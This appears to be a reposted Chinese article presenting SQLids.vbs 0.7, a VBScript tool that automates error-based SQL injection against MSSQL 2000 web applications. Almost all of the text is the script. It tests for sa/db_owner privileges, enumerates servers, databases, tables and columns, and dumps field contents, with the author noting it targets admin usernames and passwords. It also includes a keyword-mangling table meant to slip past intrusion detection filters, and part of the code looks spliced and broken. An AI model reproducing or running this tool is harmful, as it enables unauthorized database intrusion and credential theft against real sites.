是有这个问题的。
第一,应当用正则判断较好。
第二,我用循环加返回结果大于30个长度就退出循环,我相信没有表名和字段名大于30个字母的,但是字段值有可能大于,这个地方解决的不够好。但是一般是用来查后台的管理员的用户名和密码,所以就放弃了。
set arg=wscript.arguments If (LCase(Right(Wscript.fullname,11))="Wscript.Exe") Then Wscript.Quit End If if arg.count=0 then usage() Wscript.Quit End If Sub usage() wsh.echo string(79,"*") wsh.echo "暂且只支持mssql显错模式,直接写url为数字型,写url'为字符型,url里有&请用双引号包含url" wsh.echo "sqlids v0.7 for mssql2000 with error by lcx" wsh.echo "以下两个脚本可互相参考" wsh.echo "//patible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" .setRequestHeader "Connection", "Keep-Alive" .setRequestHeader "Cache-Control", "no-cache" .Send UrlEncode(Aurl(1)) 'post提交 GetBody = .ResponseBody .abort End With Set Retrieval = Nothing End Function Function BytesToBstr(Body, Cset) Dim objstream Set objstream = CreateObject("adodb.stream") objstream.Type = 1 objstream.Mode = 3 objstream.Open objstream.Write Body objstream.Position = 0 objstream.Type = 2 objstream.Charset = Cset BytesToBstr = objstream.ReadTExt objstream.Close Set objstream = Nothing End Function Function ReplaceKeyWord(Value)'绕过ids过虑 Table = "select->se%lect|[k]|insert->in%sert|[k]|update->u%pdate|[k]|delete->dele%te|[k]|drop->dr%op|[k]|alter->al%ter|[k]|create->crea%te|[k]|inner->in% ner|[k]|join->jo%in|[k]|from->fro%m|[k]|where->w%here|[k]|union->unio%n|[k]|group->grou%p|[k]|by->b%y|[k]|having->hav%ing|[k]|table->tab%le|[k]|shutdown- >shu%tdown|[k]|kill->k%ill|[k]|declare->dec%lare|[k]|open->o%pen|[k]|pwdencrypt->pwdencr%ypt|[k]|msdasql->m%sdasql|[k]|sqloledb->sqlo%ledb|[k]|char->c%har| [k]|fetch->fe%tch|[k]|nExt->ne%xt|[k]|allocate->al%locate|[k]|sys->s%ys|[k]|raiserror->raiser%ror|[k]|Exec->e%xec|[k]|=!->=%!|[k]|--->-%-|[k]|xp_->x%p_|[k] |sp_->s%p_|[k]|and->a%nd" Dim i, Relpacement, Temp Relpacement = Split(Table, "|[k]|") ReplaceKeyWord = Value For i = 0 to UBound(Relpacement) Temp = Split(Relpacement(i), "->") If UBound(Temp) = 1 Then ReplaceKeyWord = Replace(ReplaceKeyWord, Temp(0), Temp(1)) NExt End Function Function result(sHTMLTEMP) '用varchar做关键字分隔网页内容,用正则帅一点,可惜不太会 aHTML = Split(sHTMLTEMP, "varchar") If(UBound(aHTML) > 0)Then sHTMLTEMP = aHTML(1) aHTML = Split(sHTMLTEMP, "'") sHTMLTEMP = aHTML(1) End If result=sHTMLTEMP End Function Function Str2HEx(strHEx)'sql的16进制转换函数 Dim sHEx For i = 1 To Len(strHEx) sHEx = sHEx & HEx(Asc(Mid(strHEx,i,1)))&"00" NExt Str2HEx = "0x"&sHEx End Function Function Str2HExtwo(strHEx)'sql的16进制转换函数 Dim sHEx For i = 1 To Len(strHEx) sHEx = sHEx & HEx(Asc(Mid(strHEx,i,1))) NExt Str2HExtwo = "0x"&sHEx End Function Function MoveR(Rstr) '去重复 Dim i,SpStr SpStr = Split(Rstr,",") For i = 0 To Ubound(Spstr) If I = 0 then MoveR = MoveR & SpStr(i) & "," Else If instr(MoveR,SpStr(i))=0 and i=Ubound(Spstr) Then MoveR = MoveR & SpStr(i) Elseif instr(MoveR,SpStr(i))=0 Then MoveR = MoveR & SpStr(i) & "," End If End If NExt End Function function page(sql) page=Replace(getHTTPPage(url&" "&ReplaceKeyWord(sql)),Chr(34),"") End Function url=arg(0) injection =arg(1) '--------------------------------------以下代码是注入语句,完全不需要引号 select case arg(1) Case "limit" body=Replace(getHTTPPage(url),Chr(34),"") '语句单独提出来,方便以后修改,第一条是sa,第二条是DB_owner sqlone="and (select is_srvrolemember(0x730079007300610064006D0069006E00))>0--" sqltwo="and (select is_member(0x640062005F006F0077006E0065007200))>0--" Bodyone=page(sqlone) bodytwo=page(sqltwo) wsh.echo "当前信息:" If Len(body)=Len(Bodyone) Then wsh.echo "SA" If Len(body)=Len(Bodytwo) And Len(body)<>Len(Bodyone) Then wsh.echo "DB_owner" Else wsh.echo "PUBLIC" End If sqlthtree="and @@servername>0--|and @@version>0--|and user>0--|and db_name()>0--" rtemp=Split(sqlthtree,"|") servername=result(page(rtemp(0))) version=result(page(rtemp(1))) user=result(page(rtemp(2))) db_name=result(page(rtemp(3))) wsh.echo "servername:"&servername wsh.echo "version:"&version wsh.echo "user:"& user wsh.echo "db_name:"& db_name case "dbname" i=1 Do sql="and db_name("&i&")>0--" '暴库名语句 Body = page(sql) k=InstrRev(body,"varchar", -1, 0) i=i+1 If k<>0 Then wscript.echo result(body) Else wsh.echo "========over============" End if Loop Until k=0 case "table" i=1 Do ' 表名语句 agr(2)表示库 sql="and 0<>(select top 1 name from "&arg(2)&".dbo.sysobjects where xtype=0x7500 and name not in (select top "& i &" name from "&arg(2)&".dbo.sysobjects where xtype=0x7500))--" Body = page(sql) k=InstrRev(body,"varchar", -1, 0) i=i+1 If k<>0 Then wscript.echo result(body) Else wsh.echo "========over============" End if Loop Until k=0 case "filed" sqlbiaoid="an%d (se%l%e%c%t to%p 1 ca%st(id as nvarch%ar(20))%2bch%ar(124) fr%om ["&arg(2)&"]..[sy%sob%je%cts] wh%ere name="&Str2HEx(arg(3))&")=0-- " biaoid=result(page(sqlbiaoid)) biaoid=Replace(biaoid,Chr(124),"") sqlclounmcnt="an%d (se%l%e%c%t ca%st(co%unt(1) as varch%ar(10))%2bch%ar(94) fr%om ["&arg(2)&"]..[sys%columns] wh%ere id="&biaoid&")=0-- " k=Replace(result(page(sqlclounmcnt)),Chr(94),"") wsh.echo "共有列名"&k&"个" For i=1 To k sqlfiled=" an%d (se%l%e%c%t to%p 1 ca%st(name as varch%ar(8000)) fr%om (se%l%e%c%t to%p "&i&" colid,name fr%om ["&arg(2)&"]..[sys%columns] wh%ere id="&biaoid&" order by colid) t order by colid desc)=0--" wsh.echo result(page(sqlfiled)) nExt case "result" i=1 sqlcloum="and (select cast(count(1) as varch%ar(8000))%2bchar(94) from ["&arg(3)&"]..["&arg(4)&"] where 1=1)>0--" '暴列的总数目语句 k=result(page(sqlcloum)) k=Replace(k,Chr(94),"") wsh.echo arg(2)&"字段共有记录数"&k&"个"&vbcrlf For i=1 To k sqlneirong= "an%d (se%l%e%c%t to%p 1 ca%st("&arg(2)&" as varch%ar)%2bch%ar(94) fr%om (se%l%e%c%t to%p "&i&" ["&arg(2)&"] fr%om ["&arg(3)&"]..["&arg(4) &"] wh%ere 1=1 order by ["&arg(2)&"]) t wh%ere 1=1 order by ["&arg(2)&"] desc )=0--" Body = page(sqlneirong) wscript.echo Replace(result(body),Chr(94),"") Next Case "search" love=Str2HExtwo(arg(2)) wscript.echo "请稍候,正在查循,暂且只列10条,结果显示为'表名|字段名'格式" TimeSpend = Timer For i=1 To 10 '可以根据需要改动这个10 sqlsearch="And (selecttop1t_name%2bchar(124)%2bc_namefrom(selecttop"&i&"object_name(id)ast_name,nameasc_namefromsyscolumnswherecharindEx(cast("&love&"asvarchar(2000)),name)%3E0andleft(name,1)!=0x40orderbyt_nameasc)asTorderbyt_namedesc)>0--" Body = page(sqlsearch) body=result(body) a=a&body&"," NExt TimeSpend = round(Timer - TimeSpend,2) wsh.echo MoveR(a) wsh.echo "用时:" & TimeSpend & "秒." Case Else If arg(1)<>"limit" Or arg(1)<>"dbname" Or arg(1)<>"search" Or arg(1)<>"table" Or arg(1)<>"filed" Then wscript.echo "注意参数" usage() End if end select
到此这篇关于SQLids.vbs 0.7(最终版,以后改成gui界面的)的文章就介绍到这了,更多相关SQLids内容请搜索以前的文章或继续浏览下面的相关文章希望大家以后多多支持!